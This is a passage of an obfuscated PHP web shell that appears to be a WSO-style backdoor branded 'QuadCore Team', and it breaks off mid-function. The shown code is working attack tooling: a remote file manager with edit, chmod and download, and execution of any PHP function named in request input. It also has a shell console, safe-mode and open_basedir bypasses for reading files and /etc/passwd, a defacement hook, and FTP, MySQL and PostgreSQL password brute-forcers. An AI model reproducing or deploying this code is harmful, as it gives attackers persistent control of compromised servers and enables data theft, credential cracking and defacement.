="i";$tngnqyfxe="i";$hustcscfmb="ow";${"GLOBALS"}["xdqcivb"]="i";${"GLOBALS"}["zqjbkox"]="tmp";$jjlhunkbjzv="gr";${${"GLOBALS"}["ekbkfqadrg"]}=@posix_getgrgid(@filegroup(${${"GLOBALS"}["dtbigpgfvo"]}[${$pikrltvilkde}]));$qhprefsyf="dirContent";${${"GLOBALS"}["pmvkpva"]}=array("name"=>${$trksqxk}[${$tngnqyfxe}],"path"=>$GLOBALS["cwd"].${${"GLOBALS"}["dtbigpgfvo"]}[${${"GLOBALS"}["rcrtozri"]}],"modify"=>@date("Y-m-d H:i:s",@filemtime($GLOBALS["cwd"].${${"GLOBALS"}["mgypwfcol"]}[${$jlwjxkcsye}])),"perms"=>viewPermsColor($GLOBALS["cwd"].${${"GLOBALS"}["dtbigpgfvo"]}[${$bcoveqcbxn}]),"size"=>@filesize($GLOBALS["cwd"].${${"GLOBALS"}["dtbigpgfvo"]}[${${"GLOBALS"}["jlonig"]}]),"owner"=>${$gsizdosk}["name"]?${$hustcscfmb}["name"]:@fileowner(${${"GLOBALS"}["dtbigpgfvo"]}[${$xfjlrv}]),"group"=>${$jjlhunkbjzv}["name"]?${$fetkmmeo}["name"]:@filegroup(${${"GLOBALS"}["uqsacjc"]}[${${"GLOBALS"}["xdqcivb"]}]));if(@is_file($GLOBALS["cwd"].${$qhprefsyf}[${$nwjqvkomff}]))${${"GLOBALS"}["vmrrdvp"]}[]=array_merge(${${"GLOBALS"}["pmvkpva"]},array("type"=>"file"));elseif(@is_link($GLOBALS["cwd"].${${"GLOBALS"}["dtbigpgfvo"]}[${${"GLOBALS"}["rcrtozri"]}]))${${"GLOBALS"}["xdymgejnryr"]}[]=array_merge(${${"GLOBALS"}["zqjbkox"]},array("type"=>"link"));elseif(@is_dir($GLOBALS["cwd"].${${"GLOBALS"}["dtbigpgfvo"]}[${${"GLOBALS"}["rcrtozri"]}])&&(${${"GLOBALS"}["lbbiehgd"]}[${${"GLOBALS"}["krvmbfigto"]}]!="."))${$btyzbgbsfv}[]=array_merge(${${"GLOBALS"}["pmvkpva"]},array("type"=>"dir"));}$GLOBALS["sort"]=${${"GLOBALS"}["rlxsszdo"]};function cmp($a,$b){${"GLOBALS"}["uvgcovxkgw"]="a";if($GLOBALS["sort"][0]!="size")return strcmp(${${"GLOBALS"}["uvgcovxkgw"]}[$GLOBALS["sort"][0]],${${"GLOBALS"}["tbknxya"]}[$GLOBALS["sort"][0]])*($GLOBALS["sort"][1]?1:-1);else return((${${"GLOBALS"}["dcomrhopet"]}["size"]<${${"GLOBALS"}["tbknxya"]}["size"])?-1:1)*($GLOBALS["sort"][1]?1:-1);}usort(${$tpyiikox},"cmp");usort(${${"GLOBALS"}["kkcaes"]},"cmp");usort(${${"GLOBALS"}["xdymgejnryr"]},"cmp");${${"GLOBALS"}["kwvaxvtju"]}=array_merge(${${"GLOBALS"}["kkcaes"]},${$psmqlny},${${"GLOBALS"}["kwvaxvtju"]});${${"GLOBALS"}["muwqirblho"]}=0;foreach(${${"GLOBALS"}["kwvaxvtju"]} as${${"GLOBALS"}["itetujfjtui"]}){${"GLOBALS"}["bjdefzndc"]="f";$xtbaqzlqx="f";$bqvknhovurk="f";$eseckxeheh="f";$iojcwpvsjkfh="l";${"GLOBALS"}["mdzhfrve"]="f";$vxcdsdsdu="f";$hbuerrhuay="f";${"GLOBALS"}["qfbybrqqs"]="f";${"GLOBALS"}["etfhidotxt"]="f";$hfqdrxcibveu="f";${"GLOBALS"}["injnsqk"]="l";${"GLOBALS"}["akoqziui"]="l";${"GLOBALS"}["ipxrhkjp"]="f";echo"<tr".(${$iojcwpvsjkfh}?" class=l1":"")."><td><input type=checkbox name="f[]\" value="".urlencode(${$bqvknhovurk}["name"])."" class=chkbx></td><td><a href=# onclick="".((${${"GLOBALS"}["itetujfjtui"]}["type"]=="file")?"g('FilesTools',null,'".urlencode(${${"GLOBALS"}["itetujfjtui"]}["name"])."', 'view')\">".htmlspecialchars(${${"GLOBALS"}["qfbybrqqs"]}["name"]):"g('FilesMan','".${${"GLOBALS"}["itetujfjtui"]}["path"]."');"><b>[ ".htmlspecialchars(${$eseckxeheh}["name"])." ]</b>")."</a></td><td>".((${${"GLOBALS"}["itetujfjtui"]}["type"]=="file")?viewSize(${${"GLOBALS"}["mdzhfrve"]}["size"]):${${"GLOBALS"}["itetujfjtui"]}["type"])."</td><td>".${${"GLOBALS"}["bjdefzndc"]}["modify"]."</td><td>".${${"GLOBALS"}["ipxrhkjp"]}["owner"]."/".${$hbuerrhuay}["group"]."</td><td><a href=# onclick=\"g('FilesTools',null,'".urlencode(${${"GLOBALS"}["etfhidotxt"]}["name"])."','chmod')\">".${${"GLOBALS"}["itetujfjtui"]}["perms"]."</td><td><a href="#" onclick="g('FilesTools',null,'".urlencode(${$hfqdrxcibveu}["name"])."', 'rename')">R</a> <a href=\"#\" onclick=\"g('FilesTools',null,'".urlencode(${${"GLOBALS"}["itetujfjtui"]}["name"])."', 'touch')\">T</a>".((${$vxcdsdsdu}["type"]=="file")?" <a href=\"#" onclick=\"g('FilesTools',null,'".urlencode(${$xtbaqzlqx}["name"])."', 'edit')">E</a> <a href="#\" onclick="g('FilesTools',null,'".urlencode(${${"GLOBALS"}["itetujfjtui"]}["name"])."', 'download')\">D</a>":"")."</td></tr>";${${"GLOBALS"}["akoqziui"]}=${${"GLOBALS"}["injnsqk"]}?0:1;}echo"<tr><td colspan=5>
  130. <input type=hidden name=a value='FilesMan'>
  131. <input type=hidden name=c value="".htmlspecialchars($GLOBALS["cwd"])."\">
  132. <input type=hidden name=charset value=\"".(isset($_POST["charset"])?$_POST["charset"]:"")."\">
  133. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";if(!empty($_SESSION["act"])&&@count($_SESSION["f"])){echo"<option value='paste'>Paste</option>";}echo"</select>&nbsp;<input type=\"submit\" value=">>"></td><td colspan="2" align=\"right" width="1"><input name="def" value=\"By ./ChmoD" disabled=\"disabled"/>&nbsp;<input type=\"submit\" value=\"Add Deface Here" disabled=\"disabled"></td></tr>
  134. </form></table></div>";printFooter();}function actionStringTools(){if(!function_exists("hex2bin")){function hex2bin($p){return decbin(hexdec(${${"GLOBALS"}["chpcnlbltty"]}));}}if(!function_exists("hex2ascii")){function hex2ascii($p){${"GLOBALS"}["keuvci"]="r";${"GLOBALS"}["xiitssn"]="i";${"GLOBALS"}["tctmpfvzhrj"]="r";$vyvqvrrtnl="p";${${"GLOBALS"}["tctmpfvzhrj"]}="";for(${${"GLOBALS"}["rcrtozri"]}=0;${${"GLOBALS"}["rcrtozri"]}<strLen(${$vyvqvrrtnl});${${"GLOBALS"}["xiitssn"]}+=2){$pdmvrdksdnn="p";$cecjfjwvj="r";${"GLOBALS"}["cngbkgi"]="i";${$cecjfjwvj}.=chr(hexdec(${$pdmvrdksdnn}[${${"GLOBALS"}["cngbkgi"]}].${${"GLOBALS"}["chpcnlbltty"]}[${${"GLOBALS"}["rcrtozri"]}+1]));}return${${"GLOBALS"}["keuvci"]};}}if(!function_exists("ascii2hex")){function ascii2hex($p){$lnqepuxkt="i";$qvnvekbnmxr="i";$jzadbg="p";${${"GLOBALS"}["jlptvbtp"]}="";${"GLOBALS"}["wjwlukdumpm"]="r";for(${${"GLOBALS"}["rcrtozri"]}=0;${${"GLOBALS"}["rcrtozri"]}<strlen(${${"GLOBALS"}["chpcnlbltty"]});++${$qvnvekbnmxr})${${"GLOBALS"}["jlptvbtp"]}.=dechex(ord(${$jzadbg}[${$lnqepuxkt}]));return strtoupper(${${"GLOBALS"}["wjwlukdumpm"]});}}if(!function_exists("full_urlencode")){function full_urlencode($p){$iubywli="r";$jppfsugrwov="r";$sxagzxoo="i";${"GLOBALS"}["iclegvsprql"]="p";$xtneuwh="p";${"GLOBALS"}["xcnggybvpgmw"]="i";${$jppfsugrwov}="";for(${${"GLOBALS"}["rcrtozri"]}=0;${$sxagzxoo}<strlen(${$xtneuwh});++${${"GLOBALS"}["xcnggybvpgmw"]})${$iubywli}.="%".dechex(ord(${${"GLOBALS"}["iclegvsprql"]}[${${"GLOBALS"}["rcrtozri"]}]));return strtoupper(${${"GLOBALS"}["jlptvbtp"]});}}if(isset($_POST["ajax"])){$_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]=true;ob_start();if(function_exists($_POST["p1"]))echo$_POST["p1"]($_POST["p2"]);${${"GLOBALS"}["mchkcbti"]}="document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean())," \'")."';";echo strlen(${${"GLOBALS"}["mchkcbti"]}),"",${${"GLOBALS"}["mchkcbti"]};exit;}${"GLOBALS"}["nsoewhqodwh"]="k";printHeader();$sofomrplhu="v";echo"<h1>String conversions</h1><div class=content>";${${"GLOBALS"}["uohqkihp"]}=array("Base64 encode"=>"base64_encode","Base64 decode"=>"base64_decode","Url encode"=>"urlencode","Url decode"=>"urldecode","Full urlencode"=>"full_urlencode","md5 hash"=>"md5","sha1 hash"=>"sha1","crypt"=>"crypt","CRC32"=>"crc32","ASCII to HEX"=>"ascii2hex","HEX to ASCII"=>"hex2ascii","HEX to DEC"=>"hexdec","HEX to BIN"=>"hex2bin","DEC to HEX"=>"dechex","DEC to BIN"=>"decbin","BIN to HEX"=>"bin2hex","BIN to DEC"=>"bindec","String to lower case"=>"strtolower","String to upper case"=>"strtoupper","Htmlspecialchars"=>"htmlspecialchars","String length"=>"strlen",);if(empty($_POST["ajax"])&&!empty($_POST["p1"]))$_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]=false;echo"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";foreach(${${"GLOBALS"}["uohqkihp"]} as${${"GLOBALS"}["qcztealr"]}=>${$sofomrplhu})echo"<option value='".htmlspecialchars(${${"GLOBALS"}["dyhbggvolpv"]})."'>".${${"GLOBALS"}["nsoewhqodwh"]}."</option>";echo"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]?"checked":"")."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST["p2"])."</textarea></form><pre class='ml1' style='".(empty($_POST["p1"])?"display:none;":"")."margin-top:5px' id='strOutput'>";if(!empty($_POST["p1"])){if(function_exists($_POST["p1"]))echo htmlspecialchars($_POST["p1"]($_POST["p2"]));}echo"</pre></div>";printFooter();}function actionFilesTools(){${"GLOBALS"}["wclmtfnjtcx"]="m";${"GLOBALS"}["cqsfpouxl"]="fp";${"GLOBALS"}["bmywiftf"]="h";$iqsgyjeddwv="v";if(isset($_POST["p1"]))$_POST["p1"]=urldecode($_POST["p1"]);${"GLOBALS"}["xwsyitk"]="m";$motnchxswwuy="uid";${"GLOBALS"}["lptksnhyjyb"]="i";if(@$_POST["p2"]=="download"){if(is_file($_POST["p1"])&&is_readable($_POST["p1"])){ob_start("ob_gzhandler",4096);header("Content-Disposition: attachment; filename=".basename($_POST["p1"]));${"GLOBALS"}["xszegvhen"]="fp";if(function_exists("mime_content_type")){${${"GLOBALS"}["jwviedbpy"]}=@mime_content_type($_POST["p1"]);$xblmiemkwpfk="type";header("Content-Type: ".${$xblmiemkwpfk});}${${"GLOBALS"}["xszegvhen"]}=@fopen($_POST["p1"],"r");if(${${"GLOBALS"}["eqqfjdpz"]}){$cccigaaz="fp";${"GLOBALS"}["dfnubg"]="fp";${"GLOBALS"}["igkpgupuqnr"]="fp";while(!@feof(${${"GLOBALS"}["igkpgupuqnr"]}))echo@fread(${${"GLOBALS"}["dfnubg"]},1024);fclose(${$cccigaaz});}}elseif(is_dir($_POST["p1"])&&is_readable($_POST["p1"])){}exit;}if(@$_POST["p2"]=="mkfile"){if(!file_exists($_POST["p1"])){$nwqxbaonsy="fp";${"GLOBALS"}["etmrpxqy"]="fp";${$nwqxbaonsy}=@fopen($_POST["p1"],"w");if(${${"GLOBALS"}["etmrpxqy"]}){$_POST["p2"]="edit";fclose(${${"GLOBALS"}["eqqfjdpz"]});}}}${"GLOBALS"}["cjpdiozatk"]="v";printHeader();${"GLOBALS"}["swknisde"]="len";${"GLOBALS"}["zyiftbt"]="fp";echo"<h1>File tools</h1><div class=content>";$wreoxeund="v";if(!file_exists(@$_POST["p1"])){echo"File not exists";printFooter();return;}$frngeqv="gid";${${"GLOBALS"}["pkirecjc"]}=@posix_getpwuid(@fileowner($_POST["p1"]));${$frngeqv}=@posix_getgrgid(@fileowner($_POST["p1"]));$ospsrsoykneo="m";$afncbfdk="h";echo"<span>Name:</span> ".htmlspecialchars($_POST["p1"])." <span>Size:</span> ".(is_file($_POST["p1"])?viewSize(filesize($_POST["p1"])):"-")." <span>Permission:</span> ".viewPermsColor($_POST["p1"])." <span>Owner/Group:</span> ".${$motnchxswwuy}["name"]."/".${${"GLOBALS"}["uhbipydlr"]}["name"]."<br>";$sflsvnx="n";${"GLOBALS"}["rrbotko"]="len";echo"<span>Create time:</span> ".date("Y-m-d H:i:s",filectime($_POST["p1"]))." <span>Access time:</span> ".date("Y-m-d H:i:s",fileatime($_POST["p1"]))." <span>Modify time:</span> ".date("Y-m-d H:i:s",filemtime($_POST["p1"]))."<br><br>";${"GLOBALS"}["mpxczjb"]="fp";if(empty($_POST["p2"]))$_POST["p2"]="view";if(is_file($_POST["p1"]))${${"GLOBALS"}["wclmtfnjtcx"]}=array("View","Highlight","Download","Hexdump","Edit","Chmod","Rename","Touch");else${${"GLOBALS"}["xwsyitk"]}=array("Chmod","Rename","Touch");$ohxiauycxev="c";foreach(${$ospsrsoykneo} as${${"GLOBALS"}["dyhbggvolpv"]})echo"<a href=# onclick="g(null,null,null,'".strtolower(${${"GLOBALS"}["dyhbggvolpv"]})."')\">".((strtolower(${${"GLOBALS"}["cjpdiozatk"]})==@$_POST["p2"])?"<b>[ ".${$iqsgyjeddwv}." ]</b>":${$wreoxeund})."</a> ";echo"<br><br>";$dqkxuhkutww="h";switch($_POST["p2"]){case"view":echo"<pre class=ml1>";${${"GLOBALS"}["zyiftbt"]}=@fopen($_POST["p1"],"r");if(${${"GLOBALS"}["mpxczjb"]}){${"GLOBALS"}["mxkpllgpy"]="fp";${"GLOBALS"}["eorpsnbiep"]="fp";while(!@feof(${${"GLOBALS"}["eqqfjdpz"]}))echo htmlspecialchars(@fread(${${"GLOBALS"}["eorpsnbiep"]},1024));@fclose(${${"GLOBALS"}["mxkpllgpy"]});}echo"</pre>";break;case"highlight":if(is_readable($_POST["p1"])){echo"<div class=ml1 style="background-color: #e1e1e1;color:black;\">";${${"GLOBALS"}["ofsjzyplqvuh"]}=highlight_file($_POST["p1"],true);echo str_replace(array("<span ","</span>"),array("<font ","</font>"),${${"GLOBALS"}["ofsjzyplqvuh"]})."</div>";}break;case"chmod":if(!empty($_POST["p3"])){$ntwjqjqoe="i";${"GLOBALS"}["xfhmgt"]="perms";${${"GLOBALS"}["skkjgstgu"]}=0;${"GLOBALS"}["syimyzkcknh"]="perms";for(${${"GLOBALS"}["rcrtozri"]}=strlen($_POST["p3"])-1;${${"GLOBALS"}["rcrtozri"]}>=0;--${${"GLOBALS"}["rcrtozri"]})${${"GLOBALS"}["xfhmgt"]}+=(int)$_POST["p3"][${${"GLOBALS"}["rcrtozri"]}]*pow(8,(strlen($_POST["p3"])-${$ntwjqjqoe}-1));if(!@chmod($_POST["p1"],${${"GLOBALS"}["syimyzkcknh"]}))echo"Can't set permissions!<br><script>document.mf.p3.value="\";</script>";else die("<script>g(null,null,null,null,"\")</script>");}echo"<form onsubmit=\"g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value=\"".substr(sprintf("%o",fileperms($_POST["p1"])),-4)."\"><input type=submit value=">>"></form>";break;case"edit":if(!is_writable($_POST["p1"])){echo"File isn't writeable";break;}if(!empty($_POST["p3"])){@file_put_contents($_POST["p1"],$_POST["p3"]);echo"Saved!<br><script>document.mf.p3.value=\"\";</script>";}echo"<form onsubmit="g(null,null,null,null,this.text.value);return false;\"><textarea name=text class=bigarea>";${${"GLOBALS"}["eqqfjdpz"]}=@fopen($_POST["p1"],"r");if(${${"GLOBALS"}["cqsfpouxl"]}){${"GLOBALS"}["mpyhddk"]="fp";while(!@feof(${${"GLOBALS"}["eqqfjdpz"]}))echo htmlspecialchars(@fread(${${"GLOBALS"}["eqqfjdpz"]},1024));@fclose(${${"GLOBALS"}["mpyhddk"]});}echo"</textarea><input type=submit value=">>\"></form>";break;case"hexdump":${${"GLOBALS"}["grdeva"]}=@file_get_contents($_POST["p1"]);${$sflsvnx}=0;${${"GLOBALS"}["bmywiftf"]}=array("00000000<br>","","");${${"GLOBALS"}["rrbotko"]}=strlen(${$ohxiauycxev});for(${${"GLOBALS"}["rcrtozri"]}=0;${${"GLOBALS"}["lptksnhyjyb"]}<${${"GLOBALS"}["swknisde"]};++${${"GLOBALS"}["rcrtozri"]}){$sxpuifmoak="c";${"GLOBALS"}["bnnuxzxpsdl"]="c";$ffjxhxjuns="i";$flunnxclyy="i";${${"GLOBALS"}["mewyajus"]}[1].=sprintf("%02X",ord(${${"GLOBALS"}["grdeva"]}[${$ffjxhxjuns}]))." ";switch(ord(${${"GLOBALS"}["bnnuxzxpsdl"]}[${${"GLOBALS"}["rcrtozri"]}])){case 0:${${"GLOBALS"}["mewyajus"]}[2].=" ";break;case 9:${${"GLOBALS"}["mewyajus"]}[2].=" ";break;case 10:${${"GLOBALS"}["mewyajus"]}[2].=" ";break;case 13:${${"GLOBALS"}["mewyajus"]}[2].=" ";break;default:${${"GLOBALS"}["mewyajus"]}[2].=${$sxpuifmoak}[${$flunnxclyy}];break;}${${"GLOBALS"}["unpqxrqvtt"]}++;if(${${"GLOBALS"}["unpqxrqvtt"]}==32){${${"GLOBALS"}["unpqxrqvtt"]}=0;if(${${"GLOBALS"}["rcrtozri"]}+1<${${"GLOBALS"}["jfsgiz"]}){$iewofyrx="i";${${"GLOBALS"}["mewyajus"]}[0].=sprintf("%08X",${$iewofyrx}+1)."<br>";}${${"GLOBALS"}["mewyajus"]}[1].="<br>";${${"GLOBALS"}["mewyajus"]}[2].="";}}echo"<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style=\"font-weight: normal;\"><pre>".${$dqkxuhkutww}[0]."</pre></span></td><td bgcolor=#282828><pre>".${${"GLOBALS"}["mewyajus"]}[1]."</pre></td><td bgcolor=#333333><pre>".htmlspecialchars(${$afncbfdk}[2])."</pre></td></tr></table>";break;case"rename":if(!empty($_POST["p3"])){if(!@rename($_POST["p1"],$_POST["p3"]))echo"Can't rename!<br><script>document.mf.p3.value="";</script>";else die("<script>g(null,null,"".urlencode($_POST["p3"])."\",null,\"")</script>");}echo"<form onsubmit=\"g(null,null,null,null,this.name.value);return false;\"><input type=text name=name value=\"".htmlspecialchars($_POST["p1"])."\"><input type=submit value=">>"></form>";break;case"touch":if(!empty($_POST["p3"])){${"GLOBALS"}["frolnqqcqafg"]="time";${${"GLOBALS"}["frolnqqcqafg"]}=strtotime($_POST["p3"]);if(${${"GLOBALS"}["aymfqmtss"]}){if(@touch($_POST["p1"],${${"GLOBALS"}["aymfqmtss"]},${${"GLOBALS"}["aymfqmtss"]}))die("<script>g(null,null,null,null,"")</script>");else{echo"Fail!<script>document.mf.p3.value="";</script>";}}else echo"Bad time format!<script>document.mf.p3.value="";</script>";}echo"<form onsubmit=\"g(null,null,null,null,this.touch.value);return false;\"><input type=text name=touch value="".date("Y-m-d H:i:s",@filemtime($_POST["p1"]))."\"><input type=submit value=">>\"></form>";break;case"mkfile":break;}echo"</div>";printFooter();}function actionSafeMode(){$jtamwlbhb="stream";$ihsqgrye="stream";$dgalvxsungvp="ch";$kbejdmuir="temp";$rirpyktgynj="stream";${"GLOBALS"}["bkqxewdx"]="temp";${"GLOBALS"}["rklwgu"]="test";${$kbejdmuir}="";ob_start();switch($_POST["p1"]){case 1:${${"GLOBALS"}["mchkcbti"]}=@tempnam(${${"GLOBALS"}["rklwgu"]},"cx");if(@copy("compress.zlib://".$_POST["p2"],${${"GLOBALS"}["bkqxewdx"]})){echo@file_get_contents(${${"GLOBALS"}["mchkcbti"]});unlink(${${"GLOBALS"}["mchkcbti"]});}else echo"Sorry... Can't open file";break;case 2:${${"GLOBALS"}["kwvaxvtju"]}=glob($_POST["p2"]."*");if(is_array(${${"GLOBALS"}["kwvaxvtju"]})){$jcxygumxyxz="filename";foreach(${${"GLOBALS"}["kwvaxvtju"]} as${$jcxygumxyxz})echo${${"GLOBALS"}["mmanwsrndvkm"]}."";}break;case 3:${${"GLOBALS"}["wlpmwwisxba"]}=curl_init("file://".$_POST["p2"]."".SELF_PATH);curl_exec(${$dgalvxsungvp});break;case 4:ini_restore("safe_mode");ini_restore("open_basedir");include($_POST["p2"]);break;case 5:for(;$_POST["p2"]<=$_POST["p3"];$_POST["p2"]++){${"GLOBALS"}["ximbgawog"]="uid";${"GLOBALS"}["ljzqmixbdrhp"]="uid";${"GLOBALS"}["lodcvss"]="uid";${${"GLOBALS"}["ljzqmixbdrhp"]}=@posix_getpwuid($_POST["p2"]);if(${${"GLOBALS"}["lodcvss"]})echo join(":",${${"GLOBALS"}["ximbgawog"]})."";}break;case 6:if(!function_exists("imap_open"))break;${${"GLOBALS"}["ijqcddn"]}=imap_open($_POST["p2"],"","");if(${$jtamwlbhb}==FALSE)break;echo imap_body(${$ihsqgrye},1);imap_close(${$rirpyktgynj});break;}${${"GLOBALS"}["mchkcbti"]}=ob_get_clean();printHeader();echo"<h1>Safe mode bypass</h1><div class=content>";echo"<span>Copy (read file)</span><form onsubmit='g(null,null,\"1\",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2\",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3\",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,\"4\",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit='g(null,null,\"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>\"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6\",this.param.value);return false;'><input type=text name=param><input type=submit value=\">>\"></form>";if(${${"GLOBALS"}["mchkcbti"]})echo"<pre class="ml1" style=\"margin-top:5px\" id=\"Output">".${${"GLOBALS"}["mchkcbti"]}."</pre>";echo"</div>";printFooter();}function actionConsole(){if(isset($_POST["ajax"])){$_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]=true;${"GLOBALS"}["vjlovpgj"]="match";$iagxzdiafktl="temp";ob_start();echo"document.cf.cmd.value='';";${$iagxzdiafktl}=@iconv($_POST["charset"],"UTF-8",addcslashes("\$ ".$_POST["p1"]."".ex($_POST["p1"])," \'"));${"GLOBALS"}["ewhdvhje"]="temp";${"GLOBALS"}["wcpiihto"]="temp";if(preg_match("!.*cd\s+([^;]+)\$!",$_POST["p1"],${${"GLOBALS"}["vjlovpgj"]})){$gsldewhqu="match";if(@chdir(${$gsldewhqu}[1])){$GLOBALS["cwd"]=@getcwd();echo"document.mf.c.value='".$GLOBALS["cwd"]."';";}}$ekfaxvoixkp="temp";echo"document.cf.output.value+='".${${"GLOBALS"}["wcpiihto"]}."';";echo"document.cf.output.scrollTop = document.cf.output.scrollHeight;";${${"GLOBALS"}["mchkcbti"]}=ob_get_clean();echo strlen(${$ekfaxvoixkp}),"",${${"GLOBALS"}["ewhdvhje"]};exit;}printHeader();echo"<script>
  135. if(window.Event) window.captureEvents(Event.KEYDOWN);
  136. var cmds = new Array("\");
  137. var cur = 0;
  138. function kp(e) {
  139. var n = (window.Event) ? e.which : e.keyCode;
  140. if(n == 38) {
  141. cur--;
  142. if(cur>=0)
  143. document.cf.cmd.value = cmds[cur];
  144. else
  145. cur++;
  146. } else if(n == 40) {
  147. cur++;
  148. if(cur < cmds.length)
  149. document.cf.cmd.value = cmds[cur];
  150. else
  151. cur--;
  152. }
  153. }
  154. function add(cmd) {
  155. cmds.pop();
  156. cmds.push(cmd);
  157. cmds.push(\"");
  158. cur = cmds.length-1;
  159. }
  160. </script>";echo"<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(document.cf.cmd.value=='clear'){document.cf.output.value='';document.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;\"><select name=alias>";foreach($GLOBALS["aliases"]as${${"GLOBALS"}["unpqxrqvtt"]}=>${${"GLOBALS"}["dyhbggvolpv"]}){${"GLOBALS"}["cvhldrpyvub"]="n";$zalhzsyq="v";if(${$zalhzsyq}==""){${"GLOBALS"}["hnipigl"]="n";echo"<optgroup label="-".htmlspecialchars(${${"GLOBALS"}["hnipigl"]})."-"></optgroup>";continue;}${"GLOBALS"}["yolasjcc"]="v";echo"<option value="".htmlspecialchars(${${"GLOBALS"}["yolasjcc"]})."\">".${${"GLOBALS"}["cvhldrpyvub"]}."</option>";}if(empty($_POST["ajax"])&&!empty($_POST["p1"]))$_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]=false;echo"</select><input type=button onclick=\"add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=\">>\"> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER["HTTP_HOST"])."ajax"]?"checked":"")."> send using AJAX<br/><textarea class=bigarea name=output style=\"border-bottom:0;\" readonly>";if(!empty($_POST["p1"])){echo htmlspecialchars("\$ ".$_POST["p1"]."".ex($_POST["p1"]));}echo"</textarea><input type=text name=cmd style="border-top:0;width:100%;" onkeydown=\"kp(event);">";echo"</form></div><script>document.cf.cmd.focus();</script>";printFooter();}function actionLogout(){unset($_SESSION[md5($_SERVER["HTTP_HOST"])]);echo"
  161.  
  162.  
  163. <script>alert(\"Logout Successful\")</script>
  164. <body bgcolor=#ffffff><center><img src=\"http://rs1062.pbsrc.com/albums/t498/CarloC97/Anonymous/Anonymous3.png~c200"></center>
  165. <H1><center><p style=\"color: #DF0101" >*** QuadCore Team ***</p></H1>
  166. <center>
  167. <iframe src=\"http://www.facebook.com/plugins/likebox.php?
  168. href=https://www.facebook.com/
  169. me=light&amp;show_faces=true&amp;border_color=
  170. %23fff&amp;stream=false&amp;header=false&amp;height=100" scrolling="no\"
  171. frameborder="0\" style=\"background:transparent; border:none; overflow:hidden; width:200px;
  172. height:100px;\" allowtransparency=\"true\"></iframe></center>
  173. <H3><marquee scrollamount="5" scrolldelay=\"50" width=\"100%"><p style=\"color: #DF0101\" ></p></marquee></H3></body>";}function actionSelfRemove(){printHeader();if($_POST["p1"]=="yes"){if(@unlink(SELF_PATH))die("Shell has been removed");else echo"unlink error!";}echo"<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')\">Yes</a></div>";printFooter();}function actionBruteforce(){printHeader();if(isset($_POST["proto"])){echo"<h1>Results</h1><div class=content><span>Type:</span> ".htmlspecialchars($_POST["proto"])." <span>Server:</span> ".htmlspecialchars($_POST["server"])."<br>";if($_POST["proto"]=="ftp"){function bruteForce($ip,$port,$login,$pass){${"GLOBALS"}["xdkdvcxh"]="res";$xsampgq="fp";${"GLOBALS"}["qsxjmvwjiv"]="fp";${"GLOBALS"}["nohxsronk"]="fp";${"GLOBALS"}["mdubsdodblyn"]="port";${"GLOBALS"}["kfwopqyqkr"]="login";$tmnqjlysmu="ip";${"GLOBALS"}["ppdtym"]="res";${$xsampgq}=@ftp_connect(${$tmnqjlysmu},${${"GLOBALS"}["iyysmwscom"]}?${${"GLOBALS"}["mdubsdodblyn"]}:21);if(!${${"GLOBALS"}["eqqfjdpz"]})return false;${${"GLOBALS"}["xdkdvcxh"]}=@ftp_login(${${"GLOBALS"}["qsxjmvwjiv"]},${${"GLOBALS"}["kfwopqyqkr"]},${${"GLOBALS"}["smkuajl"]});@ftp_close(${${"GLOBALS"}["nohxsronk"]});return${${"GLOBALS"}["ppdtym"]};}}elseif($_POST["proto"]=="mysql"){function bruteForce($ip,$port,$login,$pass){${"GLOBALS"}["txzpfpg"]="port";${"GLOBALS"}["fuucovfdode"]="pass";${"GLOBALS"}["xouwmbt"]="res";$slpydrgwfpx="port";${"GLOBALS"}["mbsjjvrd"]="ip";${${"GLOBALS"}["xouwmbt"]}=@mysql_connect(${${"GLOBALS"}["mbsjjvrd"]}.":".${${"GLOBALS"}["txzpfpg"]}?${$slpydrgwfpx}:3306,${${"GLOBALS"}["nmnarf"]},${${"GLOBALS"}["fuucovfdode"]});@mysql_close(${${"GLOBALS"}["yeesjqjffj"]});return${${"GLOBALS"}["yeesjqjffj"]};}}elseif($_POST["proto"]=="pgsql"){function bruteForce($ip,$port,$login,$pass){$fpgzueq="login";${"GLOBALS"}["ciqlnvafo"]="server";$tyndyg="str";$nrvmdg="server";$lwevdqhyl="pass";${$tyndyg}="host='".${${"GLOBALS"}["bxqdwhtqdcu"]}."' port='".${${"GLOBALS"}["iyysmwscom"]}."' user='".${$fpgzueq}."' password='".${$lwevdqhyl}."' 